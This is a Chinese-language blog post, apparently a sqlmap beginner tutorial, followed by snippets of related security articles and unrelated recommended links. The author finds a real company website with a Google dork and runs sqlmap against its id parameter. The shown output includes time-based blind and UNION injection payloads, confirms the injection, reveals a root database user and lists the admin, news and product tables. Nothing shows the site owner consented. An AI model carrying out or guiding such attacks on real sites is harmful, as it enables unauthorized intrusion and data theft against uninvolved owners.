一 什么是sqlmap   

 sqlmap is an open source penetration testing tool that automates the
process of detecting and exploiting SQL injection flaws and taking over of
database servers. It comes with a powerful detection engine, many niche
features for the ultimate penetration tester and a broad range of switches
lasting from database fingerprinting, over data fetching from the
database,
to accessing the underlying file system and executing commands on the
operating system via out-of-band connections.

sqlmap 是一个开源的自动探测和发现sql注入漏洞以及拿下数据库服务器的工具.它有一个强大的探测引擎,许多有些的特性支持探测服务器以及拿下数据库服务器.

** 简言之 sqlmap 是个拿站工具.

二 安装.

  python 2.6 或2.7 ,mark 只是这两个主版本.sqlmap 安装可以用easy_install 或者用git clone 从仓库拿.

三 寻站

  google hack 啊, inurl:\".php\?id=

  就试下第二个吧.www.cowinbio.com/about/index.php?id=1 

  开干

  blind (heavy query)' injectable
[10:07:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:07:47] [INFO] automatically extending ranges for UNION query injection tech
ique tests as there is at least one other (potential) technique found
[10:07:49] [INFO] target URL appears to be UNION injectable with 2 columns
[10:07:49] [WARNING] combined UNION/error-based SQL injection case found on col
mn 1. sqlmap will try to find another column with better characteristics
[10:07:49] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 c
lumns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if an
)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2626 HTTP(s)
requests:
---
Parameter: id (GET)
Type: AND/OR time-based blind

然后

          _
___ ___| |_____ ___ ___ {1.0-dev-c6d4217}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutu
consent is illegal. It is the end user's responsibility to obey all applicabl
local, state and federal laws. Developers assume no liability and are not resp
sible for any misuse or damage caused by this program [*] starting at 10:15:04 you provided 'MySQL' as a back-end DBMS, but from a past scan information on t
target URL sqlmap assumes the back-end DBMS is 'mysql <5.0.11'. Do you really
ant to force the back-end DBMS value? [y/N] y
[10:15:22] [INFO] testing connection to the target URL
[10:15:22] [WARNING] there is a DBMS error found in the HTTP response body whi
could interfere with the results of the tests
[10:15:22] [INFO] checking if the target is protected by some kind of WAF/IPS/
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a)) Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a7
7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NU
-- -
---
[10:15:23] [INFO] testing MySQL
[10:15:23] [INFO] confirming MySQL
[10:15:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL < 5.0.0
[10:15:23] [INFO] fetching current user
current user: 'root@localhost'

再之后

         _
___ ___| |_____ ___ ___ {1.0-dev-c6d4217}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respo
sible for any misuse or damage caused by this program [*] starting at 10:16:44 [10:16:44] [INFO] testing connection to the target URL
[10:16:44] [WARNING] there is a DBMS error found in the HTTP response body whic
could interfere with the results of the tests
[10:16:44] [INFO] checking if the target is protected by some kind of WAF/IPS/I
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a)) Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a79
7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NUL
-- -
---
[10:16:45] [INFO] testing MySQL
[10:16:45] [INFO] confirming MySQL
[10:16:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL < 5.0.0
[10:16:45] [INFO] fetching current database
current database: 'cw'
 Database: cw
[3 tables]
+---------+
| admin |
| news |
| product |
+---------+

就到这里吧. 毕竟是写博客.本人并没有再进一步深入,希望各位看官也不要再进一步尝试了.

另外友情提醒这个站 ,你们不太安全.

郑重声明以上文章本人原创,转载请标明出处. 小三爷 此处谢过了~~.

sqlmap新手注入的更多相关文章

  1. 小白日记46:kali渗透测试之Web渗透-SqlMap自动注入(四)-sqlmap参数详解- Enumeration,Brute force,UDF injection,File system,OS,Windows Registry,General,Miscellaneous

    sqlmap自动注入 Enumeration[数据枚举] --privileges -U username[CU 当前账号] -D dvwa -T users -C user --columns  [ ...

  2. 小白日记45:kali渗透测试之Web渗透-SqlMap自动注入(三)-sqlmap参数详解-Optimization,Injection,Detection,Techniques,Fingerprint

    sqlmap自动注入 Optimization [优化性能参数,可提高效率] -o:指定前三个参数(--predict-output.--keep-alive.--null-connection) - ...

  3. 小白日记44:kali渗透测试之Web渗透-SqlMap自动注入(二)-sqlmap参数详解REQUEST

    Sqlmap自动注入(二) Request ################################################### #inurl:.php?id= 1. 数据段:--d ...

  4. 小白日记43:kali渗透测试之Web渗透-SqlMap自动注入(一)-sqlmap参数详解TARGET

    SqlMap自动注入(一) sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞[动态页面中get/post参数.cookie.HTTP头].它由Python语言开发 ...

  5. dvwa——sql手动注入和sqlmap自动注入

    手动注入 low: 源码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; ...

  6. SQLMAP自注入--INJECTION TECGBUQUES FINGERPRINT

    -p参数 指定扫描的参数 ,使--level失效 -p“user-agent,refer”这些参数也可以通过-p来指定 sqlmap.py -u "http://127.0.0.1/muti ...

  7. 风炫安全WEB安全学习第十八节课 使用SQLMAP自动化注入(二)

    风炫安全WEB安全学习第十八节课 使用SQLMAP自动化注入(二) –is-dba 当前用户权限(是否为root权限) –dbs 所有数据库 –current-db 网站当前数据库 –users 所有 ...

  8. 风炫安全WEB安全学习第十七节课 使用Sqlmap自动化注入(一)

    风炫安全WEB安全学习第十七节课 使用Sqlmap自动化注入(一) sqlmap的使用 sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器.它具有强大的检测 ...

  9. 渗透日记-利用SQLMAP伪静态注入

    今日找到一个网站,做下安全检测,url是这样的: 不是传统的.php结尾,所以很多人认为这个不能注入,其实伪静态也能注入的,这个url虽然做了伪静态,但是还是需要传递参数到数据库去查询的,试试能否注入 ...

随机推荐

  1. MFC 控件初始化的过程

    之前为了学习MFC下浏览器的用法,参考博文:http://www.cnblogs.com/firefly_liu/archive/2009/05/18/1459514.html,虽然按照作者的方法实现 ...

  2. B - Numbers That Count

    Description        "Kronecker's Knumbers" is a little company that manufactures plastic di ...

  3. C++_基础_C与C++的区别

    内容: (1)C++简介和编程的基本变化 (2)命名空间的概念和使用 (3)结构体.联合.枚举的不同 (4)布尔类型 以及 运算符别名 (5)函数的重载.缺省参数.哑元以 及内联 1.简介和编程的基本 ...

  4. 从汇编看c++的虚拟继承以及其内存布局(一)

    先看第一种最简单的情形,所有类中没有任何虚函数的菱形继承. 下面是c++源码: class Top {//虚基类 public: int i; Top(int ii) { i = ii; } }; c ...

  5. PHP实现简单爬虫

    <?php /**  * 爬虫程序 -- 原型  *  * 从给定的url获取html内容  *  * @param string $url  * @return string  */ func ...

  6. python虚拟环境Virtualenvwrapper无法升降级虚拟环境软件解决方法

    virtualenv用于创建独立的Python环境,多个Python相互独立,互不影响,它能够在没有权限的情况下安装新套件,不同应用可以使用不同的套件版本,套件升级不影响其他应用. Virtaulen ...

  7. 重读LPTHW-Lesson37

    这次是复习课  复习python符号  整理如下 1.逻辑运算符not.and.or python中逻辑运算符包括not(布尔非).and(布尔与).or(布尔或).注意以下几点: ①运算规则: 例: ...

  8. 1003 Crashing Balloon

    考察DFS的应用,判断两个数的因子. #include <stdio.h> int f1,f2; void DFS(int m,int n,int k){ ){ f2=; ) f1=; } ...

  9. codeforces 519A. A and B and Chess,

    A. A and B and Chess time limit per test 1 second memory limit per test 256 megabytes input standard ...

  10. LinearLayout的gravity属性以及其子元素的layout_gravity何时有效;RelativeLayout如何调整其子元素位置只能用子元素中的属性来控制,用RelativeLayout中的gravity无法控制!!!

    LinearLayout的gravity属性以及其子元素的layout_gravity何时有效:RelativeLayout如何调整其子元素位置只能用子元素中的属性来控制,用RelativeLayou ...